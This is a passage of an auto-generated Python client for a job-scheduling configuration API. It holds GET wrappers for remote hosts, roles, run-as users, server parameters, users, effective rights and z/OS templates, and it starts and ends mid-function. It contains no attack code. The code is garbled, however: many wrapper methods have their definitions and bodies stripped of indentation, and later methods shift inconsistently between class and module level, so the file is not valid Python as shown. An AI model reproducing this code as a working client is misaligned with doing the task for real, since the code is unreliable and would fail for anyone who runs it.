            '/config/server/{server}/agent/{agent}/mft/pgptemplates', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='list[PgpTemplateData]',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def get_remote_host_properties(self, server, remotehost, **kwargs): # noqa: E501
"""get a remote host configuration from Server # noqa: E501
Get the remote host configuration properties from the Server # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_remote_host_properties(server, remotehost, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server the remote host is connected to. (required)
:param str remotehost: The name of the remote host. (required)
:return: AddRemoteHostParams
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_remote_host_properties_with_http_info(server, remotehost, **kwargs) # noqa: E501
else:
(data) = self.get_remote_host_properties_with_http_info(server, remotehost, **kwargs) # noqa: E501
return data
    def get_remote_host_properties_with_http_info(self, server, remotehost, **kwargs):  # noqa: E501
        """get a remote host configuration from Server  # noqa: E501

        Issues ``GET /config/server/{server}/remotehost/{remotehost}``.

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.get_remote_host_properties_with_http_info(server, remotehost, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str server: The Server the remote host is connected to. (required)
        :param str remotehost: The name of the remote host. (required)
        :return: AddRemoteHostParams
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['server', 'remotehost']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # locals() snapshots the named arguments (including server and
        # remotehost); validated kwargs are then merged in.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_remote_host_properties" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'server' is set
        if ('server' not in params or
                params['server'] is None):
            raise ValueError("Missing the required parameter `server` when calling `get_remote_host_properties`")  # noqa: E501
        # verify the required parameter 'remotehost' is set
        if ('remotehost' not in params or
                params['remotehost'] is None):
            raise ValueError("Missing the required parameter `remotehost` when calling `get_remote_host_properties`")  # noqa: E501
        collection_formats = {}
        path_params = {}
        if 'server' in params:
            path_params['server'] = params['server']  # noqa: E501
        if 'remotehost' in params:
            path_params['remotehost'] = params['remotehost']  # noqa: E501
        query_params = []
        header_params = {}
        form_params = []
        local_var_files = {}
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
        # Authentication setting
        auth_settings = ['Bearer']  # noqa: E501
        return self.api_client.call_api(
            '/config/server/{server}/remotehost/{remotehost}', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='AddRemoteHostParams',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def get_remote_hosts(self, server, **kwargs): # noqa: E501
"""get Server remote hosts # noqa: E501
Get all the remote hosts of the specified Server. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_remote_hosts(server, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server to query. (required)
:return: StringListResult
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_remote_hosts_with_http_info(server, **kwargs) # noqa: E501
else:
(data) = self.get_remote_hosts_with_http_info(server, **kwargs) # noqa: E501
return data
    def get_remote_hosts_with_http_info(self, server, **kwargs):  # noqa: E501
        """get Server remote hosts  # noqa: E501

        Issues ``GET /config/server/{server}/remotehosts``.

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.get_remote_hosts_with_http_info(server, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str server: The Server to query. (required)
        :return: StringListResult
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['server']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # locals() snapshots the named arguments (including server);
        # validated kwargs are then merged in.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_remote_hosts" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'server' is set
        if ('server' not in params or
                params['server'] is None):
            raise ValueError("Missing the required parameter `server` when calling `get_remote_hosts`")  # noqa: E501
        collection_formats = {}
        path_params = {}
        if 'server' in params:
            path_params['server'] = params['server']  # noqa: E501
        query_params = []
        header_params = {}
        form_params = []
        local_var_files = {}
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
        # Authentication setting
        auth_settings = ['Bearer']  # noqa: E501
        return self.api_client.call_api(
            '/config/server/{server}/remotehosts', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='StringListResult',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def get_role(self, role, **kwargs): # noqa: E501
"""Get Authorization Role # noqa: E501
Get Authorization Role # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_role(role, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str role: The Role name. (required)
:return: RoleData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_role_with_http_info(role, **kwargs) # noqa: E501
else:
(data) = self.get_role_with_http_info(role, **kwargs) # noqa: E501
return data
    def get_role_with_http_info(self, role, **kwargs):  # noqa: E501
        """Get Authorization Role  # noqa: E501

        Issues ``GET /config/authorization/role/{role}``.

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.get_role_with_http_info(role, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str role: The Role name. (required)
        :return: RoleData
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['role']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # locals() snapshots the named arguments (including role);
        # validated kwargs are then merged in.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_role" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'role' is set
        if ('role' not in params or
                params['role'] is None):
            raise ValueError("Missing the required parameter `role` when calling `get_role`")  # noqa: E501
        collection_formats = {}
        path_params = {}
        if 'role' in params:
            path_params['role'] = params['role']  # noqa: E501
        query_params = []
        header_params = {}
        form_params = []
        local_var_files = {}
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
        # Authentication setting
        auth_settings = ['Bearer']  # noqa: E501
        return self.api_client.call_api(
            '/config/authorization/role/{role}', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='RoleData',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def get_role_associates(self, role, **kwargs): # noqa: E501
"""Get all authorization entities associated with role # noqa: E501
Get all authorization entities associated with role # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_role_associates(role, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str role: role name. (required)
:return: list[AssociateData]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_role_associates_with_http_info(role, **kwargs) # noqa: E501
else:
(data) = self.get_role_associates_with_http_info(role, **kwargs) # noqa: E501
return data
    def get_role_associates_with_http_info(self, role, **kwargs):  # noqa: E501
        """Get all authorization entities associated with role  # noqa: E501

        Issues ``GET /config/authorization/role/{role}/associates``.

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.get_role_associates_with_http_info(role, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str role: role name. (required)
        :return: list[AssociateData]
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['role']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # locals() snapshots the named arguments (including role);
        # validated kwargs are then merged in.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_role_associates" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'role' is set
        if ('role' not in params or
                params['role'] is None):
            raise ValueError("Missing the required parameter `role` when calling `get_role_associates`")  # noqa: E501
        collection_formats = {}
        path_params = {}
        if 'role' in params:
            path_params['role'] = params['role']  # noqa: E501
        query_params = []
        header_params = {}
        form_params = []
        local_var_files = {}
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
        # Authentication setting
        auth_settings = ['Bearer']  # noqa: E501
        return self.api_client.call_api(
            '/config/authorization/role/{role}/associates', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='list[AssociateData]',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def get_run_as_user(self, server, agent, user, **kwargs): # noqa: E501
"""Get Run-as user # noqa: E501
Get Run-as user details from server. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_run_as_user(server, agent, user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server. (required)
:param str agent: The Agent (required)
:param str user: The user name (required)
:return: RunAsUserData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_run_as_user_with_http_info(server, agent, user, **kwargs) # noqa: E501
else:
(data) = self.get_run_as_user_with_http_info(server, agent, user, **kwargs) # noqa: E501
return data
    def get_run_as_user_with_http_info(self, server, agent, user, **kwargs):  # noqa: E501
        """Get Run-as user  # noqa: E501

        Issues ``GET /config/server/{server}/runasuser/{agent}/{user}``.

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.get_run_as_user_with_http_info(server, agent, user, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str server: The Server. (required)
        :param str agent: The Agent (required)
        :param str user: The user name (required)
        :return: RunAsUserData
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['server', 'agent', 'user']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # locals() snapshots the named arguments (server/agent/user);
        # validated kwargs are then merged in.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_run_as_user" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'server' is set
        if ('server' not in params or
                params['server'] is None):
            raise ValueError("Missing the required parameter `server` when calling `get_run_as_user`")  # noqa: E501
        # verify the required parameter 'agent' is set
        if ('agent' not in params or
                params['agent'] is None):
            raise ValueError("Missing the required parameter `agent` when calling `get_run_as_user`")  # noqa: E501
        # verify the required parameter 'user' is set
        if ('user' not in params or
                params['user'] is None):
            raise ValueError("Missing the required parameter `user` when calling `get_run_as_user`")  # noqa: E501
        collection_formats = {}
        path_params = {}
        if 'server' in params:
            path_params['server'] = params['server']  # noqa: E501
        if 'agent' in params:
            path_params['agent'] = params['agent']  # noqa: E501
        if 'user' in params:
            path_params['user'] = params['user']  # noqa: E501
        query_params = []
        header_params = {}
        form_params = []
        local_var_files = {}
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
        # Authentication setting
        auth_settings = ['Bearer']  # noqa: E501
        return self.api_client.call_api(
            '/config/server/{server}/runasuser/{agent}/{user}', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='RunAsUserData',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def get_run_as_users_list(self, server, **kwargs): # noqa: E501
"""Get Run-as user list that match the requested search criteria. # noqa: E501
Get Run-as user list that match the requested search criteria from server. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_run_as_users_list(server, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server. (required)
:param str user: The Run-as user.
:param str agent: The agent.
:return: RunAsUsersList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_run_as_users_list_with_http_info(server, **kwargs) # noqa: E501
else:
(data) = self.get_run_as_users_list_with_http_info(server, **kwargs) # noqa: E501
return data
    def get_run_as_users_list_with_http_info(self, server, **kwargs):  # noqa: E501
        """Get Run-as user list that match the requested search criteria.  # noqa: E501

        Issues ``GET /config/server/{server}/runasusers`` with optional
        ``user``/``agent`` query filters.

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.get_run_as_users_list_with_http_info(server, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str server: The Server. (required)
        :param str user: The Run-as user.
        :param str agent: The agent.
        :return: RunAsUsersList
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['server', 'user', 'agent']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # locals() snapshots the named arguments (including server);
        # validated kwargs are then merged in.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_run_as_users_list" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'server' is set
        if ('server' not in params or
                params['server'] is None):
            raise ValueError("Missing the required parameter `server` when calling `get_run_as_users_list`")  # noqa: E501
        collection_formats = {}
        path_params = {}
        if 'server' in params:
            path_params['server'] = params['server']  # noqa: E501
        query_params = []
        # Optional search filters are sent as query parameters.
        if 'user' in params:
            query_params.append(('user', params['user']))  # noqa: E501
        if 'agent' in params:
            query_params.append(('agent', params['agent']))  # noqa: E501
        header_params = {}
        form_params = []
        local_var_files = {}
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
        # Authentication setting
        auth_settings = ['Bearer']  # noqa: E501
        return self.api_client.call_api(
            '/config/server/{server}/runasusers', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='RunAsUsersList',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def get_server_parameters(self, server, **kwargs): # noqa: E501
"""get Server parameters # noqa: E501
Get all the parameters of the specified Server. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_server_parameters(server, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server to query. (required)
:return: KeyValueListResult
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_server_parameters_with_http_info(server, **kwargs) # noqa: E501
else:
(data) = self.get_server_parameters_with_http_info(server, **kwargs) # noqa: E501
return data
    def get_server_parameters_with_http_info(self, server, **kwargs):  # noqa: E501
        """get Server parameters  # noqa: E501

        Issues ``GET /config/server/{server}/params``.

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.get_server_parameters_with_http_info(server, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str server: The Server to query. (required)
        :return: KeyValueListResult
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['server']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # locals() snapshots the named arguments (including server);
        # validated kwargs are then merged in.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_server_parameters" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'server' is set
        if ('server' not in params or
                params['server'] is None):
            raise ValueError("Missing the required parameter `server` when calling `get_server_parameters`")  # noqa: E501
        collection_formats = {}
        path_params = {}
        if 'server' in params:
            path_params['server'] = params['server']  # noqa: E501
        query_params = []
        header_params = {}
        form_params = []
        local_var_files = {}
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
        # Authentication setting
        auth_settings = ['Bearer']  # noqa: E501
        return self.api_client.call_api(
            '/config/server/{server}/params', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='KeyValueListResult',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def get_servers(self, **kwargs): # noqa: E501
"""get all the Servers name and hostname in the system # noqa: E501
Get the names and hostnames of all Servers in the system. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_servers(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: CtmDetailsList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_servers_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_servers_with_http_info(**kwargs) # noqa: E501
return data
    def get_servers_with_http_info(self, **kwargs):  # noqa: E501
        """get all the Servers name and hostname in the system  # noqa: E501

        Issues ``GET /config/servers``.

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.get_servers_with_http_info(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :return: CtmDetailsList
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Only the generic transport options are valid for this endpoint.
        all_params = []  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # locals() snapshots the named arguments; validated kwargs are then
        # merged in and the raw 'kwargs' entry discarded.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_servers" % key
                )
            params[key] = val
        del params['kwargs']
        collection_formats = {}
        path_params = {}
        query_params = []
        header_params = {}
        form_params = []
        local_var_files = {}
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
        # Authentication setting
        auth_settings = ['Bearer']  # noqa: E501
        return self.api_client.call_api(
            '/config/servers', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='CtmDetailsList',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def get_user(self, user, **kwargs): # noqa: E501
"""Get user # noqa: E501
Get user # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_user(user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str user: The user name. (required)
:return: UserData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_user_with_http_info(user, **kwargs) # noqa: E501
else:
(data) = self.get_user_with_http_info(user, **kwargs) # noqa: E501
return data
def get_user_with_http_info(self, user, **kwargs):  # noqa: E501
    """Get user  # noqa: E501

    Get user  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_user_with_http_info(user, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str user: The user name. (required)
    :return: UserData
    If the method is called asynchronously,
    returns the request thread.
    """
    # Accepted keyword arguments: the endpoint parameter plus the
    # generic request-control options.
    all_params = ['user']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    params = locals()
    # Reject unknown keyword arguments, flatten the known ones into params.
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_user" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'user' is set
    if ('user' not in params or
            params['user'] is None):
        raise ValueError("Missing the required parameter `user` when calling `get_user`")  # noqa: E501
    collection_formats = {}
    # 'user' is substituted into the URL path template below.
    path_params = {}
    if 'user' in params:
        path_params['user'] = params['user']  # noqa: E501
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501
    # Authentication setting
    auth_settings = ['Bearer']  # noqa: E501
    return self.api_client.call_api(
        '/config/authorization/user/{user}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='UserData',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_user_effective_rights(self, **kwargs):  # noqa: E501
    """Get user real effective authorizations  # noqa: E501

    Get the calling user's real effective authorizations, combined
    across all of the user's roles. Synchronous by default; pass
    ``async_req=True`` to receive the request thread instead.

    >>> thread = api.get_user_effective_rights(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :return: RoleData
    If the method is called asynchronously,
    returns the request thread.
    """
    # Both the async (thread) and sync (data) paths just forward the
    # low-level call's result, so a single return suffices.
    kwargs['_return_http_data_only'] = True
    return self.get_user_effective_rights_with_http_info(**kwargs)  # noqa: E501
def get_user_effective_rights_with_http_info(self, **kwargs):  # noqa: E501
    """Get user real effective authorizations  # noqa: E501

    Get user real effective authorizations by all his roles  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_user_effective_rights_with_http_info(async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :return: RoleData
    If the method is called asynchronously,
    returns the request thread.
    """
    # This endpoint takes no parameters of its own; only the generic
    # request-control options are accepted.
    all_params = []  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    params = locals()
    # Reject unknown keyword arguments, flatten the known ones into params.
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_user_effective_rights" % key
            )
        params[key] = val
    del params['kwargs']
    collection_formats = {}
    path_params = {}
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501
    # Authentication setting
    auth_settings = ['Bearer']  # noqa: E501
    return self.api_client.call_api(
        '/config/authorization/user/effectiveRights', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='RoleData',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_workflow_insights_status(self, **kwargs):  # noqa: E501
    """get Workflow Insights status  # noqa: E501

    Fetch the Workflow Insights status — topology and system
    parameters. Synchronous by default; pass ``async_req=True`` to
    receive the request thread instead.

    >>> thread = api.get_workflow_insights_status(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :return: WorkflowInsightsStatus
    If the method is called asynchronously,
    returns the request thread.
    """
    # The async (thread) and sync (data) outcomes are both just the
    # low-level call's return value, so forward it directly.
    kwargs['_return_http_data_only'] = True
    return self.get_workflow_insights_status_with_http_info(**kwargs)  # noqa: E501
def get_workflow_insights_status_with_http_info(self, **kwargs):  # noqa: E501
    """get Workflow Insights status  # noqa: E501

    get Workflow Insights status - topology and system parameters  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_workflow_insights_status_with_http_info(async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :return: WorkflowInsightsStatus
    If the method is called asynchronously,
    returns the request thread.
    """
    # This endpoint takes no parameters of its own; only the generic
    # request-control options are accepted.
    all_params = []  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    params = locals()
    # Reject unknown keyword arguments, flatten the known ones into params.
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_workflow_insights_status" % key
            )
        params[key] = val
    del params['kwargs']
    collection_formats = {}
    path_params = {}
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501
    # Authentication setting
    auth_settings = ['Bearer']  # noqa: E501
    return self.api_client.call_api(
        '/config/workflowinsights/status', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='WorkflowInsightsStatus',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_zos_templates(self, server, agent, **kwargs):  # noqa: E501
    """Get z/OS Templates  # noqa: E501

    List the z/OS templates available on an agent, optionally filtered
    by template name. Synchronous by default; pass ``async_req=True``
    to receive the request thread instead.

    >>> thread = api.get_zos_templates(server, agent, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str server: The Server (required)
    :param str agent: The Agent (required)
    :param str name: The z/OS Template Name
    :return: list[ZosTemplateData]
    If the method is called asynchronously,
    returns the request thread.
    """
    # Forward straight to the low-level variant; the async and sync
    # cases both return exactly what it returns.
    kwargs['_return_http_data_only'] = True
    return self.get_zos_templates_with_http_info(server, agent, **kwargs)  # noqa: E501
def get_zos_templates_with_http_info(self, server, agent, **kwargs):  # noqa: E501
    """Get z/OS Templates  # noqa: E501

    Get z/OS Templates  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_zos_templates_with_http_info(server, agent, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str server: The Server (required)
    :param str agent: The Agent (required)
    :param str name: The z/OS Template Name
    :return: list[ZosTemplateData]
    If the method is called asynchronously,
    returns the request thread.
    """
    # Accepted keyword arguments: endpoint parameters plus the generic
    # request-control options.
    all_params = ['server', 'agent', 'name']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    params = locals()
    # Reject unknown keyword arguments, flatten the known ones into params.
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_zos_templates" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'server' is set
    if ('server' not in params or
            params['server'] is None):
        raise ValueError("Missing the required parameter `server` when calling `get_zos_templates`")  # noqa: E501
    # verify the required parameter 'agent' is set
    if ('agent' not in params or
            params['agent'] is None):
        raise ValueError("Missing the required parameter `agent` when calling `get_zos_templates`")  # noqa: E501
    collection_formats = {}
